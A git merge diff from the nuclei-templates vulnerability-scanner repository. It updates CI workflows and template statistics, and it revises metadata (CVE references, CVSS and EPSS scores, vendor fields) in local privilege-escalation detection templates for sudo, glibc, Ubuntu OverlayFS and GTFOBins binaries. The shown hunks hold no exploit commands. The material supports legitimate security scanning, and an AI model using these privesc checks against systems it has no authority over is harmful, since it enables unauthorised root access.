Merge branch 'main' into phishing-templates
commit
c287ba0142
|
@ -1,22 +0,0 @@
|
||||||
name: 🗑️ Cache Purge
|
|
||||||
|
|
||||||
on:
|
|
||||||
push:
|
|
||||||
tags:
|
|
||||||
- '*'
|
|
||||||
workflow_dispatch:
|
|
||||||
|
|
||||||
jobs:
|
|
||||||
deploy:
|
|
||||||
runs-on: ubuntu-latest
|
|
||||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
|
||||||
steps:
|
|
||||||
# Wait for 5 minutes
|
|
||||||
- name: Wait for 2 minutes
|
|
||||||
run: sleep 120
|
|
||||||
|
|
||||||
- name: Purge cache
|
|
||||||
uses: jakejarvis/cloudflare-purge-action@master
|
|
||||||
env:
|
|
||||||
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
|
|
||||||
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
|
|
|
@ -9,6 +9,7 @@ on:
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
- name: Yamllint
|
- name: Yamllint
|
||||||
|
|
|
@ -11,6 +11,7 @@ on:
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
with:
|
with:
|
||||||
|
|
|
@ -9,6 +9,7 @@ on:
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
with:
|
with:
|
||||||
|
|
|
@ -9,6 +9,7 @@ on:
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@v4
|
- uses: actions/checkout@v4
|
||||||
with:
|
with:
|
||||||
|
|
|
@ -3,43 +3,10 @@ on:
|
||||||
push:
|
push:
|
||||||
paths:
|
paths:
|
||||||
- '.new-additions'
|
- '.new-additions'
|
||||||
- 'code/cves/2023/CVE-2023-6246.yaml'
|
|
||||||
- 'http/cves/2007/CVE-2007-3010.yaml'
|
|
||||||
- 'http/cves/2011/CVE-2011-4640.yaml'
|
|
||||||
- 'http/cves/2021/CVE-2021-40651.yaml'
|
|
||||||
- 'http/cves/2022/CVE-2022-38131.yaml'
|
|
||||||
- 'http/cves/2023/CVE-2023-28662.yaml'
|
|
||||||
- 'http/cves/2023/CVE-2023-47115.yaml'
|
|
||||||
- 'http/cves/2023/CVE-2023-52085.yaml'
|
|
||||||
- 'http/cves/2023/CVE-2023-6360.yaml'
|
|
||||||
- 'http/cves/2023/CVE-2023-6909.yaml'
|
|
||||||
- 'http/cves/2024/CVE-2024-1061.yaml'
|
|
||||||
- 'http/cves/2024/CVE-2024-21644.yaml'
|
|
||||||
- 'http/cves/2024/CVE-2024-21645.yaml'
|
|
||||||
- 'http/cves/2024/CVE-2024-21893.yaml'
|
|
||||||
- 'http/cves/2024/CVE-2024-22024.yaml'
|
|
||||||
- 'http/default-logins/webmethod/webmethod-integration-server-default-login.yaml'
|
|
||||||
- 'http/exposed-panels/apigee-panel.yaml'
|
|
||||||
- 'http/exposed-panels/dockge-panel.yaml'
|
|
||||||
- 'http/exposed-panels/easyjob-panel.yaml'
|
|
||||||
- 'http/exposed-panels/friendica-panel.yaml'
|
|
||||||
- 'http/exposed-panels/ivanti-connect-secure-panel.yaml'
|
|
||||||
- 'http/exposed-panels/juniper-panel.yaml'
|
|
||||||
- 'http/exposed-panels/ms-exchange-web-service.yaml'
|
|
||||||
- 'http/exposed-panels/pairdrop-panel.yaml'
|
|
||||||
- 'http/exposed-panels/passbolt-panel.yaml'
|
|
||||||
- 'http/exposed-panels/sentry-panel.yaml'
|
|
||||||
- 'http/exposed-panels/vistaweb-panel.yaml'
|
|
||||||
- 'http/exposures/logs/teampass-ldap.yaml'
|
|
||||||
- 'http/miscellaneous/balada-injector-malware.yaml'
|
|
||||||
- 'http/misconfiguration/node-express-dev-env.yaml'
|
|
||||||
- 'http/misconfiguration/sap/sap-public-admin.yaml'
|
|
||||||
- 'http/technologies/google/chromecast-detect.yaml'
|
|
||||||
- 'http/technologies/identity-server-v3-detect.yaml'
|
|
||||||
- 'http/vulnerabilities/wordpress/wp-user-enum.yaml'
|
|
||||||
workflow_dispatch:
|
workflow_dispatch:
|
||||||
jobs:
|
jobs:
|
||||||
triggerRemoteWorkflow:
|
triggerRemoteWorkflow:
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
steps:
|
steps:
|
||||||
- name: Trigger Remote Workflow with curl
|
- name: Trigger Remote Workflow with curl
|
||||||
|
|
|
@ -6,6 +6,7 @@ on:
|
||||||
jobs:
|
jobs:
|
||||||
Update:
|
Update:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
|
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||||
steps:
|
steps:
|
||||||
- name: Check out repository code
|
- name: Check out repository code
|
||||||
uses: actions/checkout@v4
|
uses: actions/checkout@v4
|
||||||
|
|
|
@ -1,34 +0,0 @@
|
||||||
code/cves/2023/CVE-2023-6246.yaml
|
|
||||||
http/cves/2007/CVE-2007-3010.yaml
|
|
||||||
http/cves/2011/CVE-2011-4640.yaml
|
|
||||||
http/cves/2021/CVE-2021-40651.yaml
|
|
||||||
http/cves/2022/CVE-2022-38131.yaml
|
|
||||||
http/cves/2023/CVE-2023-28662.yaml
|
|
||||||
http/cves/2023/CVE-2023-47115.yaml
|
|
||||||
http/cves/2023/CVE-2023-52085.yaml
|
|
||||||
http/cves/2023/CVE-2023-6360.yaml
|
|
||||||
http/cves/2023/CVE-2023-6909.yaml
|
|
||||||
http/cves/2024/CVE-2024-1061.yaml
|
|
||||||
http/cves/2024/CVE-2024-21644.yaml
|
|
||||||
http/cves/2024/CVE-2024-21645.yaml
|
|
||||||
http/cves/2024/CVE-2024-21893.yaml
|
|
||||||
http/cves/2024/CVE-2024-22024.yaml
|
|
||||||
http/default-logins/webmethod/webmethod-integration-server-default-login.yaml
|
|
||||||
http/exposed-panels/apigee-panel.yaml
|
|
||||||
http/exposed-panels/dockge-panel.yaml
|
|
||||||
http/exposed-panels/easyjob-panel.yaml
|
|
||||||
http/exposed-panels/friendica-panel.yaml
|
|
||||||
http/exposed-panels/ivanti-connect-secure-panel.yaml
|
|
||||||
http/exposed-panels/juniper-panel.yaml
|
|
||||||
http/exposed-panels/ms-exchange-web-service.yaml
|
|
||||||
http/exposed-panels/pairdrop-panel.yaml
|
|
||||||
http/exposed-panels/passbolt-panel.yaml
|
|
||||||
http/exposed-panels/sentry-panel.yaml
|
|
||||||
http/exposed-panels/vistaweb-panel.yaml
|
|
||||||
http/exposures/logs/teampass-ldap.yaml
|
|
||||||
http/miscellaneous/balada-injector-malware.yaml
|
|
||||||
http/misconfiguration/node-express-dev-env.yaml
|
|
||||||
http/misconfiguration/sap/sap-public-admin.yaml
|
|
||||||
http/technologies/google/chromecast-detect.yaml
|
|
||||||
http/technologies/identity-server-v3-detect.yaml
|
|
||||||
http/vulnerabilities/wordpress/wp-user-enum.yaml
|
|
|
@ -18,7 +18,6 @@ tags:
|
||||||
- "local"
|
- "local"
|
||||||
- "brute-force"
|
- "brute-force"
|
||||||
- "bruteforce"
|
- "bruteforce"
|
||||||
- "privesc"
|
|
||||||
- "phishing"
|
- "phishing"
|
||||||
|
|
||||||
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
# The following templates have been excluded because they have weak matchers and may generate FP results.
|
||||||
|
|
18
README.md
18
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 |
|
| cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
|
||||||
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 |
|
| panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
|
||||||
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | |
|
| wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
|
||||||
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | |
|
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
|
||||||
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | |
|
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
|
||||||
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | |
|
| wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
|
||||||
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
|
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
|
||||||
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | |
|
| tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
|
||||||
| lfi | 628 | geeknik | 225 | headless | 11 | | | | |
|
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
|
||||||
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
|
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
|
||||||
|
|
||||||
**552 directories, 8061 files**.
|
**569 directories, 8193 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
9982
TEMPLATES-STATS.md
9982
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
16
TOP-10.md
16
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2343 | dhiyaneshdk | 1137 | http | 6975 | info | 3357 | file | 312 |
|
| cve | 2386 | dhiyaneshdk | 1189 | http | 7104 | info | 3421 | file | 312 |
|
||||||
| panel | 1054 | daffainfo | 863 | file | 312 | high | 1550 | dns | 21 |
|
| panel | 1085 | daffainfo | 864 | file | 312 | high | 1583 | dns | 21 |
|
||||||
| wordpress | 941 | dwisiswant0 | 801 | workflows | 191 | medium | 1450 | | |
|
| wordpress | 953 | dwisiswant0 | 802 | workflows | 191 | medium | 1463 | | |
|
||||||
| xss | 887 | pikpikcu | 353 | network | 132 | critical | 943 | | |
|
| exposure | 892 | pikpikcu | 353 | network | 132 | critical | 959 | | |
|
||||||
| exposure | 860 | pussycat0x | 313 | code | 79 | low | 255 | | |
|
| xss | 892 | pussycat0x | 313 | code | 80 | low | 258 | | |
|
||||||
| wp-plugin | 816 | ritikchaddha | 300 | ssl | 27 | unknown | 34 | | |
|
| wp-plugin | 828 | ritikchaddha | 308 | ssl | 27 | unknown | 35 | | |
|
||||||
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
|
| osint | 678 | pdteam | 285 | javascript | 26 | | | | |
|
||||||
| tech | 653 | ricardomaia | 231 | dns | 18 | | | | |
|
| tech | 659 | ricardomaia | 231 | dns | 18 | | | | |
|
||||||
| lfi | 628 | geeknik | 225 | headless | 11 | | | | |
|
| lfi | 634 | geeknik | 227 | headless | 11 | | | | |
|
||||||
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
|
| edb | 598 | theamanrawat | 221 | cloud | 9 | | | | |
|
||||||
|
|
|
@ -9,7 +9,7 @@ info:
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 1
|
max-request: 1
|
||||||
tags: cloud,cloud-enum,azure,brute-force,enum
|
tags: cloud,cloud-enum,azure,bruteforce,enum
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
||||||
|
@ -63,4 +63,4 @@ dns:
|
||||||
part: answer
|
part: answer
|
||||||
words:
|
words:
|
||||||
- "IN\tA"
|
- "IN\tA"
|
||||||
# digest: 4a0a0047304502210099044650fcae81add403703f5262b5673a46eca139d542c751548b0f7aadcc9c022038fa381a6c09a5a8341ac70d7a4ed8339a48c947bbdd3f5bd22e5a336daf9cec:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100ad529d9d011c813ce7e0cb419a8440ca3f0bef3ca063b85560dbc678d6eb7056022022aa46f55179a7b72c6a02dcda0444e0aba98ddaa781c8118d39acd5cafdeaaf:922c64590222798bb761d5b6d8e72950
|
|
@ -9,11 +9,22 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
|
||||||
- https://www.exploit-db.com/exploits/47502
|
- https://www.exploit-db.com/exploits/47502
|
||||||
|
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
|
||||||
|
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
|
||||||
|
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 8.8
|
||||||
|
cve-id: CVE-2019-14287
|
||||||
|
cwe-id: CWE-755
|
||||||
|
epss-score: 0.34299
|
||||||
|
epss-percentile: 0.96958
|
||||||
|
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 2
|
max-request: 2
|
||||||
vendor: canonical
|
vendor: sudo_project
|
||||||
product: ubuntu_linux
|
product: sudo
|
||||||
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
|
tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -36,4 +47,4 @@ code:
|
||||||
- '!contains(code_1_response, "root")'
|
- '!contains(code_1_response, "root")'
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950
|
|
@ -10,8 +10,20 @@ info:
|
||||||
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
|
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
|
||||||
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
|
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
|
||||||
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
|
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
|
||||||
|
- http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
|
||||||
|
- http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 7.8
|
||||||
|
cve-id: CVE-2021-3156
|
||||||
|
cwe-id: CWE-193
|
||||||
|
epss-score: 0.97085
|
||||||
|
epss-percentile: 0.99752
|
||||||
|
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
vendor: sudo_project
|
||||||
|
product: sudo
|
||||||
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
|
tags: cve,cve2021,sudo,code,linux,privesc,local,kev
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -28,4 +40,4 @@ code:
|
||||||
- "malloc(): memory corruption"
|
- "malloc(): memory corruption"
|
||||||
- "Aborted (core dumped)"
|
- "Aborted (core dumped)"
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950
|
|
@ -21,8 +21,8 @@ info:
|
||||||
cvss-score: 7.8
|
cvss-score: 7.8
|
||||||
cve-id: CVE-2023-2640
|
cve-id: CVE-2023-2640
|
||||||
cwe-id: CWE-863
|
cwe-id: CWE-863
|
||||||
epss-score: 0.00047
|
epss-score: 0.00174
|
||||||
epss-percentile: 0.14754
|
epss-percentile: 0.53697
|
||||||
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
|
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -54,4 +54,4 @@ code:
|
||||||
- '!contains(code_1_response, "(root)")'
|
- '!contains(code_1_response, "(root)")'
|
||||||
- 'contains(code_2_response, "(root)")'
|
- 'contains(code_2_response, "(root)")'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950
|
|
@ -10,16 +10,21 @@ info:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-4911
|
||||||
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
|
- https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
|
||||||
- https://www.youtube.com/watch?v=1iV-CD9Apn8
|
- https://www.youtube.com/watch?v=1iV-CD9Apn8
|
||||||
|
- http://www.openwall.com/lists/oss-security/2023/10/05/1
|
||||||
|
- http://www.openwall.com/lists/oss-security/2023/10/13/11
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 7.8
|
cvss-score: 7.8
|
||||||
cve-id: CVE-2023-4911
|
cve-id: CVE-2023-4911
|
||||||
cwe-id: CWE-787
|
cwe-id: CWE-787,CWE-122
|
||||||
cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
|
epss-score: 0.0171
|
||||||
|
epss-percentile: 0.87439
|
||||||
|
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: glibc
|
vendor: gnu
|
||||||
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
|
product: glibc
|
||||||
|
tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
code:
|
code:
|
||||||
|
@ -34,4 +39,4 @@ code:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "139" # Segmentation Fault Exit Code
|
- "139" # Segmentation Fault Exit Code
|
||||||
# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950
|
|
@ -9,15 +9,21 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-6246
|
||||||
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
|
- https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
|
||||||
|
- https://access.redhat.com/security/cve/CVE-2023-6246
|
||||||
|
- https://bugzilla.redhat.com/show_bug.cgi?id=2249053
|
||||||
|
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 7.8
|
cvss-score: 7.8
|
||||||
cve-id: CVE-2023-6246
|
cve-id: CVE-2023-6246
|
||||||
cwe-id: CWE-787
|
cwe-id: CWE-787,CWE-122
|
||||||
|
epss-score: 0.00383
|
||||||
|
epss-percentile: 0.72435
|
||||||
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
vendor: glibc
|
vendor: gnu
|
||||||
|
product: glibc
|
||||||
tags: cve,cve2023,code,glibc,linux,privesc,local
|
tags: cve,cve2023,code,glibc,linux,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -33,4 +39,4 @@ code:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "127" # Segmentation Fault Exit Code
|
- "127" # Segmentation Fault Exit Code
|
||||||
# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/choom/
|
- https://gtfobins.github.io/gtfobins/choom/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,choom,privesc,local
|
tags: code,linux,choom,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/find/
|
- https://gtfobins.github.io/gtfobins/find/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,find,privesc,local
|
tags: code,linux,find,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/lua/
|
- https://gtfobins.github.io/gtfobins/lua/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,lua,privesc,local
|
tags: code,linux,lua,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/mysql/
|
- https://gtfobins.github.io/gtfobins/mysql/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,mysql,privesc,local
|
tags: code,linux,mysql,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/node/
|
- https://gtfobins.github.io/gtfobins/node/
|
||||||
metadata:
|
